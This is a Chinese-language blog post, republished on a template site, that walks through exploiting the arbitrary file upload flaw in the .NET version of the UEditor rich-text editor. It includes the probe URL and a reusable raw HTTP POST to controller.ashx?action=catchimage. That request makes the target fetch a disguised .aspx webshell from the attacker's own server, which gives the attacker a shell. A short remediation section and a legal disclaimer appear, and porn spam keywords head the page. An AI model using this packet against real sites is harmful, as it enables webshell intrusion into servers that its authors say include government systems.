国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

實戰(zhàn)紀(jì)實 | 編輯器漏洞之Ueditor-任意文件上傳漏洞 (老洞新談)

這篇具有很好參考價值的文章主要介紹了實戰(zhàn)紀(jì)實 | 編輯器漏洞之Ueditor-任意文件上傳漏洞 (老洞新談)。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

UEditor 任意文件上傳漏洞

前言

前段時間在做某政府單位的項目的時候發(fā)現(xiàn)存在該漏洞,雖然是一個老洞,但這也是容易被忽視,且能快速拿到shell的漏洞,在利用方式上有一些不一樣的心得,希望能幫助到一些還不太了解的小伙伴,故此寫了此篇文章。

一、 漏洞簡介

1.1 漏洞描述

Ueditor是百度開發(fā)的一個網(wǎng)站編輯器,目前已經(jīng)不對其進(jìn)行后續(xù)開發(fā)和更新,該漏洞只存在于該編輯器的.net版本。其他的php,jsp,asp版本不受此UEditor的漏洞的影響,.net存在任意文件上傳,繞過文件格式的限制,在獲取遠(yuǎn)程資源的時候并沒有對遠(yuǎn)程文件的格式進(jìn)行嚴(yán)格的過濾與判斷。

1.2 影響范圍

該漏洞影響UEditor的.Net版本,其它語言版本暫時未受影響。

1.3 漏洞原理

漏洞的成因是在獲取圖片資源時僅檢查了ContentType,導(dǎo)致可以繞過達(dá)到任意文件上傳。

1.4 漏洞修復(fù)

1.修改工程目錄下net/App_Code/CrawlerHandler.cs文件,添加對文件類型檢查的代碼。
2.使用各類WAF軟件,防止攻擊者上傳惡意文件。
3.檢查文件上傳路徑下是否有近期上傳的畸形圖片;檢查是否存在asp,aspx等類型危險文件。如果發(fā)現(xiàn)異常文件,請判斷后及時刪除。

二、漏洞復(fù)現(xiàn)

首先

我們進(jìn)入到該系統(tǒng)的后臺,通過挨個功能點的查看最終再此位置發(fā)現(xiàn)了一個Ueditor的編輯器。

editor插件漏洞,編輯器

第一步:

驗證碼漏洞是否存在:拼接漏洞URL地址:
UEditor/net/controller.ashx?action=catchimage

顯示{“state”:”參數(shù)錯誤:沒有指定抓取源”},就基本可以繼續(xù)嘗試漏洞利用

editor插件漏洞,編輯器

editor插件漏洞,編輯器

第二步:漏洞利用
1、先談一下部分人可能存在的誤區(qū)

例如:很多小伙伴當(dāng)看網(wǎng)上文章的時候,看到要構(gòu)造寫一個HTML的文件上傳腳本,需要把自己服務(wù)器上的圖片碼上傳到漏洞站點的時候。

第一種:有些不太了解的小伙伴在網(wǎng)上看到一些以下位置的復(fù)現(xiàn)報告的時候,有的就會說Windows系統(tǒng)沒法命名文件帶?號的,比如:xxx.jpg?.aspx 格式的。

第二種:我沒有Linux服務(wù)器怎么辦,沒法在Windows系統(tǒng)的服務(wù)器上用這種帶問號?格式的文件怎么辦,之類這樣的困惑。

很多小伙伴就還真被誤導(dǎo)進(jìn)去了。

editor插件漏洞,編輯器

editor插件漏洞,編輯器

1.1 誤區(qū)解惑

網(wǎng)上很多文章并沒有詳細(xì)說明一些看似簡單的方法步驟,但卻有時候會容易讓不太了解的人,產(chǎn)生誤導(dǎo)。

這里我來詳細(xì)解惑:
重點:
第一點:就是直接用圖片碼哪怕不需要圖片碼內(nèi)容繞過的都可以,有時候直接一個稍微免殺的aspx的碼改為jpg格式都行。最終示個人遇到的實際情況而定。
第二點:不需要用到Linux服務(wù)器,直接Windows服務(wù)器即可。

editor插件漏洞,編輯器

從上圖實踐中可以看出,哪怕是Linux系統(tǒng)類型的服務(wù)器,你用格式為:xxx.jpg?.aspx 的文件上傳也是不行的,哪怕你的服務(wù)器目錄存在該文件,也會顯示404

正確成功的方法

editor插件漏洞,編輯器

下圖可以看到上傳成功返回上傳的路徑

editor插件漏洞,編輯器

2、這里我個人經(jīng)驗常用推薦使用的方法:

(墻裂推薦大家,或者嫌麻煩想省事的朋友使用)

2.1 個人推薦:數(shù)據(jù)包構(gòu)造法

原因:當(dāng)你用網(wǎng)上很多寫用什么HTML文件的方式上傳,抓包你會發(fā)現(xiàn)其實上傳的數(shù)據(jù)包是這樣的。

editor插件漏洞,編輯器

由此我們可以換個思路想到,為何不直接用該數(shù)據(jù)包呢,以后每次遇到該編輯器漏洞,都可嘗試用該數(shù)據(jù)包修改部分內(nèi)容即可直接使用。方便又快捷。

editor插件漏洞,編輯器

通用數(shù)據(jù)包:
POST /替換漏洞URL地址拼接/UEditor/net/controller.ashx?action=catchimage HTTP/1.1
Host: x.x.x.x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua-platform: "Windows"
sec-ch-ua: "Google Chrome";v="100", "Chromium";v="100", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 49

source[]=http://替換為自己服務(wù)器開啟http服務(wù)的URL地址/666.jpg?.aspx

最后上傳成功,Getshell

editor插件漏洞,編輯器

該編輯器還有其他漏洞如SSRF,存儲型xss等,這里就不在過多贅述,感興趣的小伙伴可自行網(wǎng)上搜索嘗試。

該類型漏洞現(xiàn)在還是有不少,只要細(xì)心去發(fā)現(xiàn)。
希望此篇文章對大家能有所幫助,覺得對你有所幫助的小伙伴,可以評論加點贊!
謝謝!

?申明:本賬號所分享內(nèi)容僅用于網(wǎng)絡(luò)安全技術(shù)討論,切勿用于違法途徑,所有滲透都需獲取授權(quán),違者后果自行承擔(dān),與本號及作者無關(guān),請謹(jǐn)記守法。

免費領(lǐng)取安全學(xué)習(xí)資料包!editor插件漏洞,編輯器

滲透工具

editor插件漏洞,編輯器

技術(shù)文檔、書籍

editor插件漏洞,編輯器?editor插件漏洞,編輯器

editor插件漏洞,編輯器

面試題

幫助你在面試中脫穎而出

editor插件漏洞,編輯器

視頻

基礎(chǔ)到進(jìn)階

環(huán)境搭建、HTML,PHP,MySQL基礎(chǔ)學(xué)習(xí),信息收集,SQL注入,XSS,CSRF,暴力破解等等

editor插件漏洞,編輯器?editor插件漏洞,編輯器

editor插件漏洞,編輯器

應(yīng)急響應(yīng)筆記

editor插件漏洞,編輯器

學(xué)習(xí)路線

editor插件漏洞,編輯器文章來源地址http://www.zghlxwxcb.cn/news/detail-858859.html

到了這里,關(guān)于實戰(zhàn)紀(jì)實 | 編輯器漏洞之Ueditor-任意文件上傳漏洞 (老洞新談)的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進(jìn)行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • vue項目百度ueditor編輯器集成135和秀米,主題圖標(biāo)美化

    vue項目百度ueditor編輯器集成135和秀米,主題圖標(biāo)美化

    本文介紹vue項目里引入百度Ueditor富文本編輯器,集成135編輯器和秀米編輯器,使內(nèi)容編輯更加豐富,跳轉(zhuǎn)體驗更加絲滑。再封裝成組件,使用更加快捷。 編輯器主界面 彈框打開135編輯器 彈框打開秀米編輯器 操作說明:ueditor編輯器菜單欄集成135和秀米圖標(biāo),點擊分別彈框打

    2024年02月05日
    瀏覽(26)
  • AJAX + PHP 編輯器內(nèi)容自動備份草稿保存到本地 (適用ueditor百度編輯器或其它) 內(nèi)容變化后自動觸發(fā)備份txt文件

    AJAX + PHP 編輯器內(nèi)容自動備份草稿保存到本地 (適用ueditor百度編輯器或其它) 內(nèi)容變化后自動觸發(fā)備份txt文件

    百度自帶的自動備份功能enableAutoSave存在問題, 比如第一個文章他自動備份了.等發(fā)表第二個文章時,結(jié)果把第一個文章的內(nèi)容自動填充進(jìn)去了.關(guān)鍵你還不知情!出現(xiàn)過多次這種情況了. 一, 百度原版的 ,具體使用方法,看這里個文章 Ueditor百度編輯器內(nèi)容自動保存到本地防數(shù)據(jù)丟失

    2024年02月10日
    瀏覽(21)
  • Ueditor 富文本編輯器 插入 m3u8 和 mp4 視頻(PHP)

    Ueditor 富文本編輯器 插入 m3u8 和 mp4 視頻(PHP)

    當(dāng)前環(huán)境:PHP、Ueditor的版本是1.4.3 新的需求是,需要在Ueditor 富文本編輯器中,插入視頻播放,并且視頻格式有MP4,也有M3U8。 百度編輯器默認(rèn)的是embed,需要修改下配置。 ueditor.all.js 和 ueditor.config.js 這兩個文件要改一些東西,具體我這里就不展示了,網(wǎng)上有很多文章都有寫

    2024年02月11日
    瀏覽(37)
  • UEditor富文本編輯器上傳圖片打不開,提示“后端配置項沒有正常加載,上傳插件不能正常使用”

    UEditor富文本編輯器上傳圖片打不開,提示“后端配置項沒有正常加載,上傳插件不能正常使用”

    1、安裝 npm install?vue-ueditor-wrap 2、下載所需資源 這一步在解決報錯的時候會用到 ?????????? UEditor資源下載鏈接 上面的打不開請從下面鏈接下載項目 ueditor-download: vue項目中集成ueditor的UE資源 3、下載完成后將文件夾放到public文件夾下 4、 配置ueditor.config.js,并且在main.j

    2024年02月13日
    瀏覽(95)
  • 23 WEB漏洞-文件上傳之解析漏洞編輯器安全

    各個WEB編輯器安全講解 https://navisec.it/編輯器漏洞手冊/ 各個CMS文件上傳簡要講解 wordpress,phpcms, 參考共享的中間件漏洞PDF IIS6/7簡要說明-本地搭建 Apache配置安全–vulhub Apache解析漏洞-低版本 利用場景: 如果對方中間件apache屬于低版本,我們可以利用文件上傳,上傳一個不識

    2024年02月11日
    瀏覽(30)
  • 【富文本編輯器實戰(zhàn)】02 編寫編輯器配置文件

    【富文本編輯器實戰(zhàn)】02 編寫編輯器配置文件

    本篇文章主要內(nèi)容是項目的配置文件的編寫與講解,包括菜單項配置、語言配置、總體配置。 下圖是編輯器的總體結(jié)構(gòu): 編輯器大致可以分為兩個部分,菜單欄(圖中的 1)和下面的編輯器(圖中的 4)。其中菜單欄的內(nèi)容較多,每個菜單項都包含了圖標(biāo),說明文字(圖中的 2)。部

    2024年01月21日
    瀏覽(23)
  • 【富文本編輯器實戰(zhàn)】04 菜單組件和編輯器的整合

    【富文本編輯器實戰(zhàn)】04 菜單組件和編輯器的整合

    在上一篇文章中,我們對整個編輯器項目的大體結(jié)構(gòu)有了一定的了解,主要分為菜單欄和編輯區(qū)。菜單欄包括了編輯器的主要文本操作功能,且菜單項是可配置的。編輯器界面顯示比較簡單,是一個可編輯的 div 區(qū)域。接下來我們就來把編輯器的整體框架搭建起來,讓其可以

    2024年01月24日
    瀏覽(35)
  • 33、WEB攻防——通用漏洞&文件上傳&中間件解析漏洞&編輯器安全

    33、WEB攻防——通用漏洞&文件上傳&中間件解析漏洞&編輯器安全

    IIS爆過漏洞的版本:IIS6.0(windows server 2003)、IIS7.0和IIS7.5(windows server 2008) IIS6.0解析漏洞: 文件名:x.asp;x.jpg,jpg的文件后綴名,但是會被解析為asp文件; 目錄名:x.asp/x.jpg, 文件目錄名含有.asp后綴,x.jpg也會被解析為asp文件。 觸發(fā)條件: IIS6.0這個中間件; 上傳文件能不

    2024年01月24日
    瀏覽(29)
  • day33 文件上傳&中間件解析漏洞&編輯器安全

    day33 文件上傳&中間件解析漏洞&編輯器安全

    先判斷中間件,是否有解析漏洞,字典掃描拿到上傳點,或者會員中心,有可能存在文件上傳的地方,而后測試?yán)@過/驗證,根據(jù)實際情況判斷是白名單、黑名單還是內(nèi)容其他的繞過,繞過/驗證和中間件的解析漏洞也不行的話就看看CMS是否存在漏洞,然后看看編輯器漏洞有無

    2024年02月05日
    瀏覽(28)
  • 小迪安全33WEB 攻防-通用漏洞&文件上傳&中間件解析漏洞&編輯器安全

    小迪安全33WEB 攻防-通用漏洞&文件上傳&中間件解析漏洞&編輯器安全

    # 知識點: 1 、中間件安全問題 2 、中間件文件上傳解析 3 、 Web 應(yīng)用編輯器上傳 編輯器也就是第三方插件,一般都是文件上傳漏洞 # 詳細(xì)點: 1 、檢測層面:前端,后端等 2 、檢測內(nèi)容:文件頭,完整性,二次渲染等 3 、檢測后綴:黑名單,白名單, MIME 檢測等 4 、繞過技

    2024年03月16日
    瀏覽(31)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包